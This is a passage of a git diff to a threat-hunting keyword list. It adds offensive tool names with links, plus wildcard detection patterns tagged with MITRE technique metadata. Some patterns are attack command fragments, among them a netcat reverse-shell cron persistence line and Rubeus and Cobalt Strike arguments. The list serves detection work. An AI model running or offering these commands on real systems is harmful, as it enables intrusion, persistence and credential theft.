+"webBrowserPassView","https://www.nirsoft.net/utils/web_browser_password.html" +"WebDavC2","https://github.com/Arno0x/WebDavC2" +"WebDeveloperSecurityChecklist","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist" +"web-hacking-toolkit","https://github.com/signedsecurity/web-hacking-toolkit" +"weevely","https://github.com/sunge/Weevely" +"Weevely3","https://github.com/epinna/weevely3" +"wePWNise","https://github.com/FSecureLABS/wePWNise" +"WerTrigger","https://github.com/sailay1996/WerTrigger" +"westwind","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"wetransfer","https://twitter.com/mthcht/status/1658853848323182597" +"WeVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"wevtutil","N/A" +"wfuzz","https://github.com/xmendez/wfuzz" +"WhatBreach","https://github.com/Ekultek/WhatBreach" +"whatlicense","https://github.com/charlesnathansmith/whatlicense" +"where","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" +"WheresMyImplant","https://github.com/0xbadjuju/WheresMyImplant" +"whiskeysamlandfriends","https://github.com/secureworks/whiskeysamlandfriends" +"whoami","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml" +"Whoer VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"wifi-arsenal","https://github.com/0x90/wifi-arsenal" +"wifibroot","https://github.com/hash3liZer/WiFiBroot" +"wifi-bruteforcer-fsecurify","https://github.com/faizann24/wifi-bruteforcer-fsecurify" +"wifi-bruteforcer-fsecurity","https://github.com/faizann24/wifi-bruteforcer-fsecurify" +"wifigrabber","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber" +"wifijammer","https://github.com/hash3liZer/wifijammer" +"wifijammer","https://github.com/DanMcInerney/wifijammer" +"wifiphisher","https://github.com/wifiphisher/wifiphisher" +"WiFi-Pumpkin","https://github.com/P0cL4bs/WiFi-Pumpkin" +"wifite2","https://github.com/derv82/wifite2" +"win-brute-logon","https://github.com/DarkCoderSc/win-brute-logon" +"windapsearch","https://github.com/ropnop/windapsearch" +"WinDefenderKiller","https://github.com/S12cybersecurity/WinDefenderKiller" +"WindfarmDynamite","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite" +"WindmillVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"WindowsExploitationResources","https://github.com/FULLSHADE/WindowsExploitationResources" +"Windows-Exploit-Suggester","https://github.com/AonCyberLabs/Windows-Exploit-Suggester" +"windows-login-phish","https://github.com/CipherKill/windows-login-phish" +"Windows-Post-Exploitation","https://github.com/emilyanncr/Windows-Post-Exploitation" +"windows-privesc-check","https://github.com/pentestmonkey/windows-privesc-check" +"Windows-Privilege-Escalation","https://github.com/frizb/Windows-Privilege-Escalation" +"Windscribe","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Winpayloads","https://github.com/nccgroup/Winpayloads" +"WinPwn","https://github.com/S3cur3Th1sSh1t/WinPwn" +"WinPwnage","https://github.com/rootm0s/WinPwnage" +"winrs","N/A" +"WinSCPPasswdExtractor","https://github.com/NeffIsBack/WinSCPPasswdExtractor" +"WinShellcode","https://github.com/DallasFR/WinShellcode" +"WINspect","https://github.com/A-mIn3/WINspect" +"WirelessKeyView","https://www.nirsoft.net/utils/wireless_key.html" +"wireshark","https://www.wireshark.org/" +"wiresocks","https://github.com/sensepost/wiresocks" +"WitnessMe","https://github.com/byt3bl33d3r/WitnessMe" +"WLAN-Windows-Passwords","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords" +"WMEye","https://github.com/pwn1sher/WMEye" +"wmic","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/" +"wmic","N/A" +"wmic","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md" +"wmic","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"WMIcmd","https://github.com/nccgroup/WMIcmd" +"wmiexec","https://github.com/WKL-Sec/wmiexec" +"wmiexec","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127" +"wmiexec2","https://github.com/ice-wzl/wmiexec2" +"wmiexec-pro","https://github.com/XiaoliChan/wmiexec-Pro" +"WMImplant","https://github.com/FortyNorthSecurity/WMImplant" +"WMIPersistence","https://github.com/mdsecactivebreach/WMIPersistence" +"Wmisploit","https://github.com/secabstraction/WmiSploit" +"wordlists","https://www.kali.org/tools/wordlists/" +"wordlists","https://github.com/clem9669/wordlists" +"wordsmith","https://github.com/skahwah/wordsmith" +"WorkingVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"WorldWind-Stealer","https://github.com/Leecher21/WorldWind-Stealer" +"wpaf","https://github.com/kancotdiq/wpaf" +"WPScan","https://github.com/wpscanteam/wpscan" +"WSPCoerce","https://github.com/slemire/WSPCoerce" +"WSUSpendu","https://github.com/AlsidOfficial/WSUSpendu" +"wsuxploit","https://github.com/pimps/wsuxploit" +"xcopy","N/A" +"Xerror","https://github.com/projectdiscovery/nuclei-burp-plugin" +"Xerror","https://github.com/Chudry/Xerror" +"xmrig","https://github.com/xmrig/xmrig/" +"xrdp","https://github.com/neutrinolabs/xrdp" +"xspy -display","https://github.com/mnp/xspy/blob/master/xspy.c" +"xss-labs","https://github.com/paralax/xss-labs" +"XSS-Payloads","http://www.xss-payloads.com/" +"XSStrike","https://github.com/UltimateHackers/XSStrike" +"xxd","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"XXEinjector","https://github.com/enjoiz/XXEinjector" +"yodo","https://github.com/b3rito/yodo" +"ysoserial.net","https://github.com/pwntester/ysoserial.net" +"zarp","https://github.com/hatRiot/zarp" +"ZenMate VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"zeroday-powershell","https://github.com/OneLogicalMyth/zeroday-powershell" +"zerologon","https://github.com/michaelpoznecki/zerologon" +"zerosum0x0","https://github.com/zerosum0x0" +"Zloader","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/" +"Zloader","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/" diff --git a/threathunting-keywords.csv b/threathunting-keywords.csv index 314c50330..fe7d17d2a 100644 --- a/threathunting-keywords.csv +++ b/threathunting-keywords.csv @@ -1,20051 +1,20281 @@ -keyword,metadata_keyword_type,metadata_tool,metadata_description,metadata_tool_techniques,metadata_tool_tactics,metadata_malwares_name,metadata_groups_name,metadata_category,metadata_link,metadata_enable_endpoint_detection,metadata_enable_proxy_detection,metadata_comment,metadata_severity_score,metadata_popularity_score,metadata_github_stars,metadata_github_forks,metadata_github_updated_at,metadata_github_created_at -* --coin=monero*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -* - Sensitive Accounts.csv*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -* - ShadowSpray*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -* $exploit_oneliner*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -* $FodHelperPath*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* $lse_find_opts *,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -* $payload_oneliner *,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -* * 0x* - HOOK DETECTED*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -* */lsass.o*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,0,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -* ./sf.py -l 127.0.0.1:5001*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -* ./tor.keyring *,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* .\tor.keyring *,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* .beacon_keys -*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -* /.exegol/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* /altservice:ldap *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /asrepkey*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /bin/nc * -e /bin/bash* > cron && crontab cron*,greyware_tool_keyword,nc,Linux Persistence Shell cron,T1053 - T1037,TA0003,N/A,N/A,Persistence,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -* /bin/nc * -e /bin/bash*> * crontab cron*,greyware_tool_keyword,nc,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -* /c sc query WinDefend*,greyware_tool_keyword,sc,Get information about Windows Defender service,T1518.001 - T1049,TA0007 - TA0009,N/A,N/A,Discovery,https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* /cmdtech:* /cmd:* /impuser:*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,0,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -* /cmdtech:* /cmd:* /query:*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,0,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -* /createnetonly:*cmd.exe*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /createnetonly:*cmd.exe*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /credpassword*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /creduser:* /credpassword:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /impersonateuser:* /msdsspn:* /ptt*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ldap * /printcmd*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ldapfilter:'admincount=1'*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /modules:* /target:* /linkedsql:*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,0,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -* /NAME:* /KILL*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -* /nofullpacsig *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /outfile:* /spn:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /outfile:* /spns:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /PID:* /DRIVER:*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 